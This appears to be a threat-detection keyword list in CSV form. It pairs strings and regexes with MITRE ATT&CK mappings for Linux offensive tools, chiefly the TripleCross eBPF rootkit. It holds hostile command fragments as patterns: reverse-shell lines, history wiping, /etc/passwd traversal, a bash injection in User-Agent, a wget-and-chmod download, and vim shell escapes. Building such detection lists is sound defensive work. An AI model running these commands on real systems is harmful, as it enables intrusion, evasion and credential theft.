"*/TripleCross-0.1.0/*",".{0,1000}\/TripleCross\-0\.1\.0\/.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*>> Where to hide the payload? Select a number: *",".{0,1000}\>\>\sWhere\sto\shide\sthe\spayload\?\sSelect\sa\snumber\:\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Activate all of rootkit's hooks*",".{0,1000}Activate\sall\sof\srootkit\'s\shooks.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*activate_command_control_shell(*",".{0,1000}activate_command_control_shell\(.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*activate_command_control_shell_encrypted(*",".{0,1000}activate_command_control_shell_encrypted\(.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Activated COMMAND & CONTROL encrypted shell*",".{0,1000}Activated\sCOMMAND\s\&\sCONTROL\sencrypted\sshell.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Activated COMMAND & CONTROL shell*",".{0,1000}Activated\sCOMMAND\s\&\sCONTROL\sshell.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Activating COMMAND & CONTROL with MULTI-PACKET backdoor trigger*",".{0,1000}Activating\sCOMMAND\s\&\sCONTROL\swith\sMULTI\-PACKET\sbackdoor\strigger.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Backdoor did not understand the request*",".{0,1000}Backdoor\sdid\snot\sunderstand\sthe\srequest.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Backdoor sent unrecognizable message:*",".{0,1000}Backdoor\ssent\sunrecognizable\smessage\:.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Crafting malicious SYN packet*",".{0,1000}Crafting\smalicious\sSYN\spacket.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Detected possible phantom shell command*",".{0,1000}Detected\spossible\sphantom\sshell\scommand.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*h3xduck/TripleCross*",".{0,1000}h3xduck\/TripleCross.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","1","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Libbpf-powered rootkit*",".{0,1000}Libbpf\-powered\srootkit.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*truncate -s0 *bash_history'*",".{0,1000}truncate\s\-s0\s.{0,1000}bash_history\'.{0,1000}","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","#linux","greyware tool - risks of False positive !","10","10","9917","2830","2024-12-03T04:36:14Z","2017-10-11T17:23:32Z"
"*tsh_runshell(*",".*perror\("".*""\)|.*pel_(send|recv)_msg\(.*\)|.*tsh_(runshell|get_file|put_file)\(.*","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#linux","N/A","10","6","543","128","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z"
"*redsocks-fw.sh stop*",".{0,1000}redsocks\-fw\.sh\sstop.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","#linux","N/A","9","3","277","27","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z"
"*Malicious program execve hijacker executed*",".{0,1000}Malicious\sprogram\sexecve\shijacker\sexecuted.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*uname -a* w* id* /bin/bash -i*",".{0,1000}uname\s\-a.{0,1000}\sw.{0,1000}\sid.{0,1000}\s\/bin\/bash\s\-i.{0,1000}","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","C2","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","#linux","greyware tool - risks of False positive !","N/A","10","8447","2214","2024-12-07T14:47:48Z","2016-12-24T09:48:49Z"
"*PATH_EXECUTION_HIJACK_PROGRAM*",".{0,1000}PATH_EXECUTION_HIJACK_PROGRAM.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*unix_cached_ad_hashes.rb*",".{0,1000}unix_cached_ad_hashes\.rb.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*unix_kerberos_tickets.rb*",".{0,1000}unix_kerberos_tickets\.rb.{0,1000}","offensive_tool_keyword","linikatz","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tool","https://github.com/CiscoCXSecurity/linikatz","1","1","#linux","N/A","10","6","531","79","2023-10-19T17:01:47Z","2018-11-15T22:19:47Z"
"*Rootkit is already installed*",".{0,1000}Rootkit\sis\salready\sinstalled.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Running hijacking process*",".{0,1000}Running\shijacking\sprocess.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Sending malicious packet to infected machine*",".{0,1000}Sending\smalicious\spacket\sto\sinfected\smachine.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Sending malicious packet to infected machine*",".{0,1000}Sending\smalicious\spacket\sto\sinfected\smachine.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Spawn a phantom shell - with pattern-based trigger*",".{0,1000}Spawn\sa\sphantom\sshell\s\-\swith\spattern\-based\strigger.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Spawn encrypted pseudo-shell with IP - with *",".{0,1000}Spawn\sencrypted\spseudo\-shell\swith\sIP\s\-\swith\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Spawn plaintext pseudo-shell with IP - using *",".{0,1000}Spawn\splaintext\spseudo\-shell\swith\sIP\s\-\susing\s.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*../../../../../../etc/passwd*",".{0,1000}\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","5977","1385","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z"
"*The backdoor just signaled an ACK. This should not have happened*",".{0,1000}The\sbackdoor\sjust\ssignaled\san\sACK\.\sThis\sshould\snot\shave\shappened.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*Waiting for rootkit response*",".{0,1000}Waiting\sfor\srootkit\sresponse.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*xdp/backdoor.h*",".{0,1000}xdp\/backdoor\.h.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking -  persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux","N/A","10","10","1793","222","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z"
"*unset HISTFILE*",".{0,1000}unset\sHISTFILE.{0,1000}","greyware_tool_keyword","unset","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","#linux","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A"
"*unset HISTFILE*",".{0,1000}unset\sHISTFILE.{0,1000}","greyware_tool_keyword","unset","covering history tracks on linux system","T1070 - T1070.001 - T1070.004 - T1070.003 - T1070.002","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://rosesecurity.gitbook.io/red-teaming-ttps/linux","1","0","#linux","risk of False positive","5","8","N/A","N/A","N/A","N/A"
"*unset HISTFILESIZE*",".{0,1000}unset\sHISTFILESIZE.{0,1000}","greyware_tool_keyword","unset","covering history tracks on linux system","T1070 - T1070.001 - T1070.004 - T1070.003 - T1070.002","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://rosesecurity.gitbook.io/red-teaming-ttps/linux","1","0","#linux","risk of False positive","5","8","N/A","N/A","N/A","N/A"
"*unset HISTSIZE*",".{0,1000}unset\sHISTSIZE.{0,1000}","greyware_tool_keyword","unset","covering history tracks on linux system","T1070 - T1070.001 - T1070.004 - T1070.003 - T1070.002","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://rosesecurity.gitbook.io/red-teaming-ttps/linux","1","0","#linux","risk of False positive","5","8","N/A","N/A","N/A","N/A"
"*/unshackle.git*",".{0,1000}\/unshackle\.git.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","#linux #windows","N/A","10","10","1817","121","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z"
"*/unshackle.modules*",".{0,1000}\/unshackle\.modules.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","#linux #windows","N/A","10","10","1817","121","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z"
"*Fadi002/unshackle*",".{0,1000}Fadi002\/unshackle.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","#linux #windows","N/A","10","10","1817","121","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z"
"*unshackle --*",".{0,1000}unshackle\s\-\-.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","0","#linux #windows","N/A","10","10","1817","121","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z"
"*unshackle-main*",".{0,1000}unshackle\-main.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","#linux #windows","N/A","10","10","1817","121","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z"
"*unshackle-v1.0.iso*",".{0,1000}unshackle\-v1\.0\.iso.{0,1000}","offensive_tool_keyword","unshackle","Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux","T1110.004 - T1059.004 - T1070.004","TA0006 - TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Fadi002/unshackle","1","1","#linux #windows","N/A","10","10","1817","121","2023-11-10T19:48:10Z","2023-07-19T22:30:28Z"
"*\usbmon.txt*",".{0,1000}\\usbmon\.txt.{0,1000}","offensive_tool_keyword","usbmon","USB capture for Linux.","T1052 - T1059 - T1090 - T1105 - T1114 - T1124 - T1497 - T1557","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Sniffing & Spoofing","https://www.kernel.org/doc/Documentation/usb/usbmon.txt","1","0","#linux #windows","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*vncviewer *.*:5901*",".{0,1000}vncviewer\s.{0,1000}\..{0,1000}\:5901.{0,1000}","greyware_tool_keyword","vncviewer","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","RMM","N/A","1","0","#linux","greyware_tools high risks of false positives","10","10","N/A","N/A","N/A","N/A"
"*user|username|login|pass|password|pw|credentials*",".{0,1000}user\|username\|login\|pass\|password\|pw\|credentials.{0,1000}","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","#linux","N/A","9","10","3457","574","2023-12-25T14:46:47Z","2019-02-13T11:02:21Z"
"*vulmon*Vulmap*",".{0,1000}vulmon.{0,1000}Vulmap.{0,1000}","offensive_tool_keyword","Vulmap","Vulmap is an open-source online local vulnerability scanner project. It consists of online local vulnerability scanning programs for Windows and Linux operating systems. These scripts can be used for defensive and offensive purposes. It is possible to make vulnerability assessments using these scripts. Also. they can be used for privilege escalation by pentesters/red teamers.","T1210.001 - T1190 - T1059 - T1213","TA0007 - TA0002 - TA0008 - TA0011","N/A","N/A","Vulnerability Scanner","https://github.com/vulmon/Vulmap","1","1","#linux #windows","N/A","10","10","955","196","2023-03-18T23:56:41Z","2018-09-07T15:49:36Z"
"*User-Agent: *echo; echo; /bin/bash -c *",".{0,1000}User\-Agent\:\s.{0,1000}echo\;\secho\;\s\/bin\/bash\s\-c\s.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux","N/A","8","10","10906","1625","2024-10-25T08:41:45Z","2020-11-13T16:35:20Z"
"* install samdump2*",".{0,1000}\sinstall\ssamdump2.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
"* wcreddump (windows credentials dump)*",".{0,1000}\swcreddump\s\(windows\scredentials\sdump\).{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
"* wcreddump.py*",".{0,1000}\swcreddump\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
"*Uses eBPF to dump secrets use by PAM (Authentication) module*",".{0,1000}Uses\seBPF\sto\sdump\ssecrets\suse\sby\sPAM\s\(Authentication\)\smodule.{0,1000}","offensive_tool_keyword","pamspy","Credentials Dumper for Linux using eBPF","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/citronneur/pamspy","1","0","#linux","N/A","10","10","1119","61","2024-09-09T13:19:12Z","2022-07-01T19:33:43Z"
"*usr/bin/wget -O /tmp/a http* chmod 755 /tmp/cron*",".{0,1000}usr\/bin\/wget\s\-O\s\/tmp\/a\shttp.{0,1000}\schmod\s755\s\/tmp\/cron.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file echowrecker. samba 2.2 and 3.0.2a - 3.0.12-5 RCE (with DWARF symbols)  for FreeBSD  OpenBSD 3.1  OpenBSD 3.2 (with a non-executable stack  zomg)  and Linux. Likely CVE-2003-0201. There is also a Solaris version","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tool","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/echowrecker","1","0","#linux","N/A","N/A","10","4099","2069","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z"
"*vim /etc/ssh/sshd_config*",".{0,1000}vim\s\/etc\/ssh\/sshd_config.{0,1000}","greyware_tool_keyword","ssh","modification of the sshd configuration file - couldbe an attacker establishing persistence or a legitimate admin behavior","T1059.004 - T1078 - T1053","TA0005 - TA0003 - TA0006","N/A","N/A","Persistence","https://x.com/mthcht/status/1827714529687658796","1","0","#linux","greyware tool - risks of False positive !","9","10","N/A","N/A","N/A","N/A"
"*vim -c ':py3 import os* os.execl(\""/bin/sh\*",".{0,1000}vim\s\-c\s\'\:py3\simport\sos.{0,1000}\sos\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*vimdiff -c ':py3 import os* os.execl(\""/bin/sh\*",".{0,1000}vimdiff\s\-c\s\'\:py3\simport\sos.{0,1000}\sos\.execl\(\\\""\/bin\/sh\\.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"* WINHELLO2hashcat.py*",".{0,1000}\sWINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
"*/wcreddump.git*",".{0,1000}\/wcreddump\.git.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","#linux #windows","N/A","10","1","71","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z"
